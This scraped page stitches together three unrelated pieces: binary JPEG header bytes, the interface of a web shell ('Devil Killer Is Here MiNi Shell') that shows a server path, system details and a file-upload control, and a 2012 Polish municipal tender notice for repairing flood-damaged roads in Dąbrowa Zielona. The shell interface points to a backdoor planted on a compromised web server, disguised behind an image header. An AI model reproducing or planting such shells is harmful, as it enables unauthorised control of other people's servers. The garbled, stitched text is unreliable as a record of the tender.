JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120315/81566-N-2012.html

<p class="kh_header"><b>Dąbrowa Zielona: Remont dróg gminnych na terenie sołectwa Dąbrowa Zielona  w ramach usuwania skutków powodzi w maju 2010r</b><br>
<b>Numer ogłoszenia: 81566 - 2012; data zamieszczenia: 15.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Zielona , Plac Kościuszki 31, 42-265 Dąbrowa Zielona, woj. śląskie, tel. 034 3555018, faks 034 3555052.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dabrowazielona.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg gminnych na terenie sołectwa Dąbrowa Zielona  w ramach usuwania skutków powodzi w maju 2010r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zadania przewiduje się m.in. wykonanie następujących robót z podziałem na 3 części - zadania

3.1. ZADANIE nr I pt. Remont dróg gminnych na terenie sołectwa Dabrowa Zielona w ramach usuwania skutków  powodzi w maju 2010r w miejscowości ZALAS BIEDY droga na działce nr 1058- odcinek od Km0+000 do Km 0+925. - etap I
Zakres prac dla Zadania I obejmuje następujące roboty:
- roboty pomiarowe - odtworzenie trasy i punktów wysokościowych, ustalenie niwelety drogi,
- ręczne karczowanie zalegających zagajników odcinkami w koronie drogi,
- mechaniczne wykonanie koryta drogi gł. 20 cm z transportem urobku na odl. 3 km.
- mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne,
- regulacja urządzeń wod-kan,
- wykonanie podbudowy dolnej gr.22 cm kruszywem stabilizowanym mechanicznie wg. normy PN-S-06-102,
- wykonanie górnej podbudowy gr. 8 cm kruszywem stabilizowanym mechanicznie wg. normy PN-S-06-102,
- wymiana załamanego przepustu pod koroną drogi z rur  PEHD fi 600 mm,
- oczyszczenie i skropienie podbudowy emulsją szybko rozpadową w ilości 0,8 kg/m2,
- wykonanie warstwy ścieralnej z betonu asfaltowego AC11S gr. 5 cm dla ruchu (KR-3-4) g WT2,
- utwardzenie pobocza po obydwu stronach ulicy szer. 2 x 0,70 m kruszywem, stabilizowanym mechanicznie gr. 8 cm wg normy PN-S-06-101,
- renowacja zamulonego rowu z ujściem do rowu,
- wykonanie rowów przydrożnych odcinkami,
- umocnienie rowu płytami ażurowymi gr.10 cm , z wypełnieniem przestrzeni gruntem rodzimym,
- wykonanie poręczy rurowych na remontowanym przepuście,
- ułożenie nawierzchni na zjazdach do posesji z AC11-S gr.4 cm gr. 4 cm. dla ruchu (KR-3-4) g WT2,

3.2. ZADANIE nr II pt Remont dróg gminnych na terenie sołectwa Dabrowa Zielona w ramach usuwania skutków  powodzi w maju 2010r. w miejscowości DĄBROWA ZIELONA droga na działkach nr 2299 i 211 (końcowy odcinek drogi o nr ewid. 211 na terenie sołectwa Olbrachcice)-odcinek od Km 0+000 do Km 2+250. - etap I 
Zakres prac dla Zadania II obejmuje następujące roboty na odcinkach: 
Odcinek I Km 0+000 do Km 0+ 364
- roboty pomiarowe - wyznaczenie niwelety drogi,
- wykonanie koryta drogi na gł. 30 cm z wywozem urobku na odl. 4 km,
- profilowanie koryta i zagęszczenie na Km 0+ 000 do Km 0+364,
- ułożenie krawężników betonowych 15 x 30 na ławie betonowej , 
- wykonanie dolnej podbudowy gr. 25 cm,
- wykonanie górnej podbudowy z frezu gr. 5,0 cm,
- ręczne plantowanie gruntu rodzimego na szer. 2x 0,5 m,
- skropienie podbudowy emulsją szybko - rozpadową podbudowy w ilości 08 kg/m2
- dywanik - warstwa ścieralna gr. 5 cm  o uziarnieniu ciągłym AC 11 S na lepiszczu 
  50/70 (dla KR 3-4) wg. WT2
Odcinek II Km 0 + 364 do Km 2+ 070
- roboty pomiarowe - wyznaczenie niwelety drogi,
- wycinka krzaków , podszycia i samosiewów,
- profilowanie koryta i zagęszczenie podłoża,
- wykonanie dolnej podbudowy gr. 20 cm z kruszywa z odzysku ze składowiska,
- załadunek i transport kruszywa z odzysku z podbudowy na odl. 4 km,
- wykonanie górnej podbudowy z żużla EHZ gr. 5 cm,
- wykonanie rowu przydrożnego,
- przepusty z rur polietylenowych typu PEHD o śr. nominalnej 400 mm - rury o długości 
  6,0m 4 szt.
Km od 2+ 070 do Km 2+ 250
- wykonanie koryta drogi z transportem urobku ziemnego na odl. 4 km,
- wykonanie dolnej podbudowy gr. 25 cm z kruszywa łamanego stabilizowanego 
  mechanicznie wg PN S-06-102
- wykonanie górnej podbudowy gr. 5 cm z frezu,
- skropienie podbudowy emulsją szybko - rozpadową podbudowy w ilości 08 kg/m2
- dywanik - warstwa ścieralna gr. 5 cm o uziarnieniu ciągłym AC 11 S na lepiszczu 50/70 (dla KR 3-4) wg. WT2 ,
- plantowanie obustronnych poboczy.

3.3. ZADANIE nr III pt Remont dróg gminnych na terenie sołectwa Dabrowa Zielona w ramach usuwania skutków  powodzi w maju 2010r. w miejscowości DĄBROWA ZIELONA droga na działce nr 1386-odcinek od Km 0+000 do Km 0+500. - etap I 
Zakres prac dla Zadania III obejmuje następujące roboty:
- roboty pomiarowe - odtworzenie trasy i punktów wysokościowych , 
- ręczne karczowanie zalegających zagajników odcinkami w koronie drogi,
- mechaniczne wykonanie koryta drogi z transportem urobku na odl. 4 km.,
- mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne,
- formowanie nasypu z gruntu odcinkami w celu utrzymania niwelety drogi,
- regulacja urządzeń wod-kan,
- wykonanie podbudowy dolnej gr. 25 cm kruszywem stab. mechanicznie wg normy 
  PN-S-06-102
- wykonanie górnej podbudowy gr. 10 cm kruszywem stab. mechanicznie wg normy
  PN-S-06-102
- zabudowa krawężników 15 x 30 na ławie betonowej z oporem - na  Km od 0+000 do 
  Km 0+030,
- oczyszczenie i skropienie podbudowy emulsją szybko rozpadową w ilości 0,8 kg/m2,
- wykonanie warstwy ścieralnej z betonu asfaltowego na Km od 0+000 do Km 0+ 250 
  AC11-S gr. 5 cm dla ruchu (KR-3-4) wg WT2 na bazie lepiszcza 50/70,
- utwardzenie pobocza po obydwu stronach drogi szer. 2 x 0,65 m kruszywem
  stabilizowanym mechanicznie gr. 7 cm  na odcinku na którym jest BA wg normy
  PN-S-06-102,
- ułożenie nawierzchni na zjazdach do gospodarstw z AC11-S gr. 5 cm dla ruchu (KR-3-4) wg WT2 na bazie lepiszcza 50/70,
- wzmocnienie podbudowy z frezu na zjazdach do gospodarstw gr. 10 cm,
- remont skarpy nasypu z trylinki - ( remont bruku o grub. 15 cm z kostek sześciokątnych na koronach nasypu),
- wykonanie odwodnienia liniowego na szerokości jezdni,
- montaż wpustu ulicznego szt. 1,
- zabudowa studni chłonnych szt. 2.

Szczegółowy opis przedmiotu zamówienia zawiera opis techniczny, SIWZ, szczegółowa specyfikacja techniczna wyk. i odbioru robót, przedmiary robót.
W/w dokumenty są załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej zamawiającego: http://bip.dabrowazielona.pl
W przypadku, gdyby wykonawca nie posiadał dostępu do internetu, musi to zgłosić zamawiającemu. W takiej sytuacji dokumentacja projektowa będzie udostępniana (wypożyczana) wykonawcom w celu sporządzenia oferty.

Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone  ww. dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez zamawiającego decyzji o akceptacji równoważników lub odrzuceniu oferty z powodu ich nierównoważności. 

Wycena oferty powinna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających- nie więcej niż 50% wartości zamówienia podstawowego i polegających na remoncie dróg gminnych tj. wykonaniu podbudowy pod drogę, odwodnienia drogi, renowacji rowów przydrożnych i nawierzchni ścieralnej z betonu asfaltowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga złożenia wadium.
    1/ Wadium ustala się w wysokości odpowiednio: 
Dla Części - Zadania nr I  -  10.000,00zł (słownie: dziesięć tysięcy złotych)
Dla Części -Zadania nr II -  10.000.00 zł (słownie: dziesięć tysięcy złotych)
Dla Części -Zadania nr III -   6.000,00 zł (słownie: sześć tysięcy złotych)

Dla wszystkich części 26.000 zł (słownie: dwadzieścia sześć tysięcy złotych)

    2/ Wadium należy wnieść w terminie do dnia 02.04.2012r do godz. 10:00
    3/ Wadium może  być wnoszone w jednej lub kilku następujących formach:
        a) pieniądzu,
        b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
            kredytowej , z tym , że poręczenie kasy jest zawsze poręczeniem pieniężnym ,
        c) gwarancjach bankowych
        d) gwarancjach ubezpieczeniowych,
        e) poręczeniach udzielanych przez podmioty o których mowa  w art. 6b ust.5 pkt.2
            ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju 
            Przedsiębiorczości (j.t. Dz. U. z 2007r Nr 42 , poz. 275 z póź, zm.)
     4/ Wadium wnoszone w pieniądzu należy wpłacić na rachunek Urzędu Gminy 
         W Dąbrowie Zielonej:
         Bank Spółdzielczy w Koniecpolu Oddział w Dąbrowie Zielonej
          Nr rachunku: 63827610132002020000130103
      5/ Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin 
         uznania na rachunku zamawiającego.
     6/ Wadium w innej formie niż pieniądz należy złożyć w formie oryginału 
         W sekretariacie Urzędu Gminy w Dąbrowie Zielonej, pl. Kościuszki 31 , a 
         kserokopię potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do
        składania oświadczeń woli w imieniu Wykonawcy dołączyć do oferty.
    7/ W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte
        W art. 45 i 46.
    8/ W przypadku nie zabezpieczenia oferty jedną z określonych w niniejszej specyfikacji
        form wadium wykonawca zostanie wykluczony z udziału w postępowaniu , a jego 
        oferta podlegać będzie odrzuceniu.

UWAGA:
W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może zatrzymać wadium  wraz z odsetkami.
Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a ustawy Prawo zamówień publicznych , tj. jeżeli Wykonawca w
        odpowiedzi na wezwanie , o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień
        publicznych nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust.1
        ustawy Prawo zamówień publicznych lub pełnomocnictw;
    2) w art. 46 ust. 5 ustawy Prawo zamówień publicznych tj. jeżeli Wykonawca którego
        oferta została wybrana:
    a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
        określonych w ofercie,
    b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
    c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn
       leżących po stronie Wykonawcy.
Poza tym z powyższego dokumentu powinno wynikać jednoznacznie , gwarantowanie wypłaty należności w sposób nieodwołalny , bezwarunkowy i na pierwsze żądanie.
Wadium takie powinno obejmować cały okres związania ofertą , poczynając od daty składania ofert.
Wadium w innej formie niż pieniądz należy złożyć łącznie z ofertą (ale w oddzielnej kopercie , by nie było na stałe związane z ofertą).

Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia tj. udokumentują wykonanie, tj. zakończenie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch robót budowlanych, polegających na wykonaniu remontu , budowy lub przebudowy dróg:
dla ZADANIA nr 1 o długości co najmniej 800 mb (każda)
dla ZADANIA nr 2 o długości co najmniej 2.000 mb (każda)
dla ZADANIA nr 3 o długości co najmniej 400 mb (każda)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia tj. osobą która będzie pełnić funkcję kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności: 
dla: Zadania Nr I, Zadania Nr II, Zadania Nr III, drogowej bez ograniczeń; określone przepisami Prawa budowlanego oraz co najmniej trzy letnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót w realizacji budowy lub przebudowy dróg i budynków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji finansowej - zamawiający nie określa szczególnych warunków w tym zakresie.


Ww. warunki zostaną uznane za spełnione, jeżeli wykonawca przedstawi dokumenty określone:                                              
a) w punktach od 6.1. do 6.3. niniejszej specyfikacji,     
	 lub                                        
b) w punkcie 6.4.2. niniejszej specyfikacji - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone np. referencje</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wszystkie ww. dokumenty winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu Wykonawcy.
	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.

W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum), każdy ze wspólników musi złożyć dokumenty wymienione w punkcie 6.1. niniejszej specyfikacji (lub w punkcie 6.4.2. niniejszej specyfikacji - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej)
Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 

. Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 

W przypadku wykonawców wspólnie ubiegających się o zamówienie, kopie dokumentów potwierdzających spełnianie warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów, powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dotyczących go dokumentów) lub przez pełnomocnika konsorcjum jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).

. Inne dokumenty wymagane przez zamawiającego:
a) wypełniony druk OFERTA, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych, stanowiący załącznik nr 2 do niniejszej specyfikacji,
b) dowód wpłaty wadium,

